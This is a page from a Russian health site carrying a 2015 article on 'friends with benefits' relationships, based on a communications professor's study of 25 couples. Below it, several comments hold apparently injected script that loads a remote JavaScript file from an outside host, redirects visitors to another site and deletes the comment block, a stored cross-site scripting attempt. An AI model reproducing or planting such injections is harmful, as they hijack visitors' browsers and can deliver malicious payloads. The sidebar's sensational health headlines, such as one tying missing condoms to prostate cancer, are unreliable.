Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Секс с друзьями: хорошо и...  >>  Секс с друзьями: хорошо или плохо? Ученые разобрались!
 
Обратная связь
 

Секс с друзьями: хорошо или плохо? Ученые разобрались!

Размер шрифта
12 мая 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые подтверждают, что «дружба с привилегиями» – худший вариант отношений в паре. Удачно все сложилось только у героев фильма «Секс по дружбе», так что если вы не Мила Кунис, то и не стоит пробовать.

Секс с друзьями: хорошо или плохо? Ученые разобрались!

Отношения, в которых занятие сексом не сопровождается эмоциональной привязанностью, могут стать самыми сложными и тяжелыми в вашей жизни. Несмотря на все приятные моменты, которыми они будут полны, плохих воспоминаний в итоге все равно будет больше. Скорее всего, вы не сможете больше оставаться друзьями, ведь велика вероятность, что один из вас будет влюблен, а второй не сможет ответить ему взаимностью. И вам придется еще долго восстанавливаться, прежде чем вступить в новые отношения.

Психологи и социологи уже не раз изучали подобные отношения, которые часто называют «дружба с привилегиями», и пришли к единогласному решению: ничего хорошего от них ждать не стоит. Согласна с этим и Кендра Найт, профессор по коммуникациям из Университета Де Поля, которая провела исследование отношений 25 пар таких «друзей с привилегиями». Она надеялась выяснить, в чем же кроется основная проблема таких отношений и как в конце концов можно избежать печального финала.

Согласно профессору Найт, в начале подобных отношений оба партнера соглашаются, что общение и обсуждение допустимых границ – это обязательное условие. Однако в итоге никто не хочет сделать первый шаг в искреннем общении. Это может закончиться тем, что у одного из партнеров возникнут чувства к другому, ведь не всем удается заниматься сексом без появления эмоциональной привязанности. Но вряд ли они смогут поговорить об этом, ведь они помнят, что в основе их отношений лежал договор об отсутствии этой самой привязанности.

Другой причиной, почему «друзья с привилегиями» избегают откровенного общения и обсуждения ситуации, является нежелание одного из друзей показаться не просто влюбленным, но и ревнивым. Ведь в таком случае велика вероятность, что партнер, которому нужен лишь секс без обязательств, разорвет отношения и найдет себе кого-то еще.

Отношения «друзей с привилегиями» не будут работать без общения, но никто из партнеров не хочет делать первый шаг в этом направлении. Так что подобные отношения уже заранее обречены. Да, в большинстве случаев они длятся лишь несколько дней или даже одну ночь после пьяной вечеринки, тогда никто и не задумывается о последствиях.

Но не стоит недооценивать работы, подобные исследованию профессора Найт. Даже если вы не воспримете сделанные ей выводы всерьез, они как минимум дадут вам повод к размышлению и возможно уберегут вас от необдуманных поступков и отношений в будущем.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:11

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Оказывается, оргазм нельзя сымитировать! Ваш партнер все равно все поймет!   Как секс избавит вас от врачей   Сколько времени нужно на «любовь с первого взгляда»?   Лучший секс в жизни за 2 недели! Вторая неделя  
26 апреля 2013Не заставляйте мужчин убираться дома! Последнее исследование показало, что у таких пар меньше секса! 12 декабря 2012Гормон оргазма не дает мужчинам изменять
 
18 сентября 2012Нет презерватива? Будет рак простаты! 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Секреты сексуально удовлетворенных женщин
Почему болит во время секса?
Почему вы не хотите заниматься сексом?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.